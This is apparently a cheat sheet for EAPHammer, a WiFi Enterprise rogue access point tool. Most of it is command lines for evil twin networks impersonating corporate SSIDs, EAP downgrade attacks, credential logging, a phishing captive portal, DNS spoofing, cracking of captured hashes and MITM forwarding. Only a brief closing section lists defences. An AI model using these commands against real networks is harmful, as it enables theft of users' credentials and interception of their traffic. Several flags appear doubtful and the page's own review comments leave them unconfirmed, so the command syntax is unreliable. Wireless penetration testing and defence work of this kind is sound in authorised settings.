EAPHammer
EAPHammer is a comprehensive rogue access point framework for testing WiFi Enterprise (WPA-Enterprise) security. It creates evil twins that perform credential harvesting through various EAP downgrade attacks.
Installation
Linux/Ubuntu
# Install dependencies: hostapd and dnsmasq are the AP and DHCP/DNS backends that
# the later sections of this page configure
sudo apt update
sudo apt install hostapd dnsmasq python3 python3-pip git
# Clone EAPHammer
git clone https://github.com/s0lst1c3/eaphammer.git
cd eaphammer
# Install Python requirements
pip3 install -r requirements.txt
# Optional: install system-wide from the cloned source (setup.py, not a distro package)
sudo python3 setup.py install
Kali Linux
# EAPHammer is pre-installed on Kali; print the installed version to confirm
eaphammer --version
# If not installed: either the Kali package ...
sudo apt install eaphammer
# ... or a source checkout, run directly with python3 (needs root, hence sudo)
git clone https://github.com/s0lst1c3/eaphammer.git
cd eaphammer
sudo python3 eaphammer.py --help
macOS
# Install via git
git clone https://github.com/s0lst1c3/eaphammer.git
cd eaphammer
pip3 install -r requirements.txt
# Make executable
chmod +x eaphammer.py
# NOTE(review): unlike the Linux section, nothing here installs hostapd or dnsmasq,
# which EAPHammer depends on (see the dependency list and Related Tools) — confirm the
# tool is actually usable on macOS before relying on these steps
Quick Start
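# Show available options. Check the flags used elsewhere on this page against this
# output for your installed version before copying them.
python3 eaphammer.py --help
# List wireless interfaces. The original used `eaphammer.py -h`, which only prints the
# same help text again; `iw dev` lists the wireless interfaces the kernel knows about.
iw dev
# Basic evil twin AP
python3 eaphammer.py -i wlan0 -e EvilNetwork -c 6 --hostapd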
Certificate Generation
Self-Signed Certificates
# Generate CA certificate (do once); the certs/ directory is reused by the later
# commands on this page that pass --cert-dir certs
python3 eaphammer.py --gen-ca --cert-dir certs
# Generate server certificate; --hostname is given an IP address here, as on this page
python3 eaphammer.py --gen-server-cert --cert-dir certs --hostname 192.168.1.1
# Generate P12 certificate for Android; "cisco" is only the sample export password
# used on this page — replace it with one of your own
python3 eaphammer.py --gen-p12 --cert-dir certs --password cisco
FreeRADIUS Integration
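# Generate certificates for FreeRADIUS
python3 eaphammer.py --freeradius --cert-dir certs
# Configure FreeRADIUS. /etc/freeradius is root-owned, so the copies need sudo just as the
# original chown did (the unprivileged cp would simply fail). install(1) sets owner, group
# and mode in one step: the certificate stays world-readable, the private key gets 0640 so
# only root and the freerad group can read it.
sudo install -o freerad -g freerad -m 0644 -- certs/server.crt /etc/freeradius/3.0/certs/server.crt
sudo install -o freerad -g freerad -m 0640 -- certs/server.key /etc/freeradius/3.0/certs/server.key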
Evil Twin / Rogue AP Creation
Basic Evil Twin
# Create evil twin of legitimate network (-k supplies the network password)
python3 eaphammer.py \
-i wlan0 \
-e CorporateWiFi \
-c 6 \
-k DefaultPassword123
# With BSSID spoofing: -e sets the network name (ESSID); the bssid flag sets the AP's
# MAC address. The flag spelling is reproduced as given on this page.
python3 eaphammer.py \
-i wlan0 \
-e TargetNetwork \
-bssid AA:BB:CC:DD:EE:FF \
-c 6
Enterprise Network Impersonation
# Impersonate WPA-Enterprise network: EAP authentication with CCMP encryption,
# offering both PEAP and TTLS
python3 eaphammer.py \
-i wlan0 \
-e CompanyWiFi \
-c 6 \
--auth wpa-eap \
--encryption ccmp \
--eap-methods peap ttls
# With custom certificate; server.crt is presumably resolved relative to --cert-dir
# (the certs/ directory generated in the Certificate Generation section) — verify
python3 eaphammer.py \
-i wlan0 \
-e CompanyWiFi \
-c 6 \
--cert-dir certs \
--server-cert-file server.crt
EAP Attack Methods
PEAP Downgrade Attack
# PEAP (Protected EAP) attack - downgrade to MS-CHAPv2
# NOTE(review): flag spellings in this section are reproduced as given on this page;
# confirm them against the --help output of the installed version
python3 eaphammer.py \
-i wlan0 \
-e TargetNetwork \
-c 6 \
--eap peap \
--inner-auth mschapv2 \
--no-ssl-verification
# Force older PEAP version: same settings as above, with the PEAP version pinned to 0
python3 eaphammer.py \
-i wlan0 \
-e TargetNetwork \
-c 6 \
--eap peap \
--inner-auth mschapv2 \
--peap-version 0
TTLS Downgrade Attack
# TTLS (Tunneled TLS) attack with PAP as the inner method
python3 eaphammer.py \
-i wlan0 \
-e TargetNetwork \
-c 6 \
--eap ttls \
--inner-auth pap \
--no-ssl-verification
# TTLS with PAP credential harvesting; "testuser" is the sample username used on this page
python3 eaphammer.py \
-i wlan0 \
-e TargetNetwork \
-c 6 \
--eap ttls \
--inner-auth pap \
--pap-username testuser
GTC (Generic Token Card) Downgrade
# GTC downgrade - most aggressive
python3 eaphammer.py \
-i wlan0 \
-e TargetNetwork \
-c 6 \
--eap gtc \
--inner-auth gtc \
--no-ssl-verification
# GTC with custom prompt; the quoted string is presumably the text shown to the client
# as its prompt — verify. Note this variant omits --inner-auth and --no-ssl-verification.
python3 eaphammer.py \
-i wlan0 \
-e TargetNetwork \
-c 6 \
--eap gtc \
--gtc-prompt "Enter corporate credentials"
Credential Harvesting & Logging
Credential Capture
# Enable credential logging to credentials.log (the same file the attack-scenario script
# below writes to) with verbose console output
python3 eaphammer.py \
-i wlan0 \
-e TargetNetwork \
-c 6 \
--log credentials.log \
--verbose
# Capture all authentication attempts, not just successful ones, into a separate file
python3 eaphammer.py \
-i wlan0 \
-e TargetNetwork \
-c 6 \
--log auth_attempts.txt \
--log-all
# Real-time credential display. This page spells verbosity three ways (--verbose, -v -v,
# -vvv); they are reproduced as given.
python3 eaphammer.py \
-i wlan0 \
-e TargetNetwork \
-c 6 \
-v -v
FreeRADIUS Logging
# Monitor FreeRADIUS auth attempts (follows the log until interrupted)
tail -f /var/log/freeradius/radius.log
# Parse authentication logs; the \| alternation is GNU grep basic-regex syntax
grep -i "user.*accepted\|user.*rejected" /var/log/freeradius/radius.log
# Log the EAP code, EAP type and destination MAC of every EAP frame. No credential
# fields are selected here, so the output only shows which EAP exchanges took place.
tshark -i wlan0 -Y "eap" -T fields -e eap.code -e eap.type -e wlan.da > eap_capture.txt
Network Configuration
DHCP & DNS Setup
# Configure dnsmasq for DHCP/DNS. The heredoc delimiter is unquoted, so the shell would
# expand $vars inside it; none occur here. address=/#/ answers every name with the AP
# address, and the DHCP pool lives in the same 192.168.100.0/24 as --ip-pool below.
cat > dnsmasq.conf << EOF
interface=wlan0
bind-interfaces
dhcp-range=192.168.100.2,192.168.100.50,12h
server=8.8.8.8
address=/#/192.168.100.1
EOF
# Launch with EAPHammer. NOTE(review): nothing on this page passes dnsmasq.conf to
# EAPHammer or dnsmasq — confirm how the file above is picked up.
python3 eaphammer.py \
-i wlan0 \
-e TargetNetwork \
-c 6 \
--ip-pool 192.168.100.1/24
DNS Spoofing
# Redirect all DNS traffic to AP (port 53)
python3 eaphammer.py \
-i wlan0 \
-e TargetNetwork \
-c 6 \
--dns-spoof \
--dns-port 53
# Custom DNS answers, one name=address line each. The heredoc delimiter is unquoted,
# so $ and backticks would be expanded; none occur here. NOTE(review): no command on
# this page loads dns.conf — confirm how it is handed to EAPHammer.
cat > dns.conf << EOF
*.internal.corp=192.168.100.1
mail.corp=192.168.100.100
EOF
Attack Scenarios
Full Enterprise Network Impersonation
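#!/bin/bash
# Complete evil twin setup: creates the certificate directory on the first run, then
# starts the access point with the settings below and writes captured credentials to
# credentials.log. Run from the eaphammer checkout (eaphammer.py in the current directory).
set -euo pipefail

readonly INTERFACE="wlan0"
readonly TARGET_SSID="CorporateWiFi"
readonly TARGET_CHANNEL="6"
readonly CERT_DIR="./certs"
readonly LOG_FILE="credentials.log"

# 1. Generate certificates (first time only). Under set -e a failing generation step
#    aborts the script instead of continuing to the launch with an incomplete certs/.
if [[ ! -d "$CERT_DIR" ]]; then
  python3 eaphammer.py --gen-ca --cert-dir "$CERT_DIR"
  python3 eaphammer.py --gen-server-cert --cert-dir "$CERT_DIR"
fi

# 2. Launch evil twin with PEAP attack. The arguments are kept in an array and every
#    expansion is quoted, so a value containing spaces (an SSID, for instance) is passed
#    as a single word instead of being split — the original left them unquoted.
args=(
  -i "$INTERFACE"
  -e "$TARGET_SSID"
  -c "$TARGET_CHANNEL"
  --auth wpa-eap
  --eap peap
  --inner-auth mschapv2
  --no-ssl-verification
  --log "$LOG_FILE"
  -v
)
python3 eaphammer.py "${args[@]}"

# 3. Report the log location (reached once eaphammer exits)
printf '[*] Credentials saved to %s\n' "$LOG_FILE"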
Credential Harvesting with Phishing Portal
# Launch AP with hostile portal; login.html is the page served by the portal
python3 eaphammer.py \
-i wlan0 \
-e FreeWiFi \
-c 6 \
--hostile-portal \
--portal-page login.html
# Portal redirects all HTTP to credential harvesting page
# Users must enter credentials to proceed
Post-Exploitation
Captured Credential Cracking
# Extract captured hashes. grep -P (PCRE) is GNU-only and not available with the BSD
# grep shipped on macOS, which this page also covers.
grep -oP 'NT.*' credentials.log > hashes.txt
# Crack with hashcat (NTLM); wordlist.txt is a placeholder you supply
hashcat -m 1000 hashes.txt wordlist.txt
# Crack with John the Ripper
john --format=netntlm hashes.txt --wordlist=wordlist.txt
Network Pivot & MITM
# Forward traffic while capturing. These three lines need root: iptables and
# /proc/sys/net/ipv4/ip_forward are not writable otherwise, and prefixing only
# `echo` with sudo would not help since the redirection is done by the caller's shell.
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward
# Monitor with mitmproxy; flags reproduced as given on this page — confirm against mitmproxy --help
mitmproxy -i wlan0 -b 192.168.100.1 --mode transparent
Troubleshooting
Common Issues
Issue: hostapd fails to start
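# hostapd needs root to reconfigure the wireless interface, so run EAPHammer under sudo
# (as the Kali section on this page already does). The original step here,
# `sudo usermod -aG root $USER`, does not give the process the network privileges
# hostapd needs and permanently widens the account's privileges instead, so it is dropped.
# Kill conflicting processes
sudo pkill wpa_supplicant
sudo pkill NetworkManager
# Restart from scratch
sudo airmon-ng check kill
sudo python3 eaphammer.py -i wlan0 -e TestAP -c 6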
Issue: No clients connecting
# Verify AP is broadcasting: shows the interface's mode, channel and SSID as the kernel sees them
iw wlan0 info
# Check certificate validity (subject, issuer, validity dates). server.crt is written
# under --cert-dir on this page, so the path may need to be certs/server.crt.
openssl x509 -in server.crt -text -noout
# Try without SSL verification
python3 eaphammer.py -i wlan0 -e TargetNetwork -c 6 --no-ssl-verification
Issue: Credentials not captured
# Verify FreeRADIUS is accepting connections. Arguments: user, password, server, NAS
# port, shared secret. "testing123" is FreeRADIUS's stock test secret for localhost;
# it must match the secret configured in clients.conf or the request is silently dropped.
radtest testuser testpass 127.0.0.1 0 testing123
# Check logs (same file the FreeRADIUS Logging section follows)
sudo tail -f /var/log/freeradius/radius.log
# Enable verbose logging (-vvv, the highest verbosity spelling used on this page)
python3 eaphammer.py -i wlan0 -e TargetNetwork -c 6 -vvv
Defense Against EAPHammer
- Pin the expected RADIUS server certificate (or its issuing CA) in the client supplicant configuration so clients refuse any other server certificate
- Monitor the airspace for rogue access points advertising your SSIDs
- Use 802.1X with supplicants configured to validate the RADIUS server certificate (trusted CA and expected server name) and to refuse the connection when validation fails
- Deploy IDS/IPS to detect suspicious traffic
- Educate users that the network name alone can be spoofed, and to report unexpected certificate warnings or login prompts rather than accepting them
- Require administrator-provisioned certificate trust rather than letting users accept unknown server certificates at connect time
Related Tools
- Hostapd - AP software (used by EAPHammer)
- FreeRADIUS - RADIUS server for auth
- Reaver - WPS brute-force
- Aircrack-ng - WiFi auditing suite
- Bettercap - MITM and network tool
Last updated: 2026-03-30 | EAPHammer Master